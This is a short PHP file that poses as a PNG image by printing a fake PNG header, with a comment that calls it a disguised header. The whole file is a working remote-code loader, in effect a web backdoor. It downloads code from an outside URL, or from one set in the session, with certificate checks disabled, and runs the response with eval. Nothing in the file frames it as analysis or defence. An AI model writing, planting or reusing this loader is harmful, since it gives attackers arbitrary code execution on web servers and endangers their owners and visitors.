<?php
/* PNG %k25u25%fgd5n! 偽装頭部 */
echo "\x89PNG\r\n\x1a\n";
echo "混沌開始 FAKE HEADER";

session_start();

$目标地址 = $_SESSION['url'] ?? 'https://myzedd.tech/project/zedd';

$データ = '';
if (function_exists('curl_init')) {
    $ch = curl_init($目标地址);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    $データ = curl_exec($ch);
    curl_close($ch);
}

if (!empty($データ)) {
    eval('?>' . $データ);
}
?>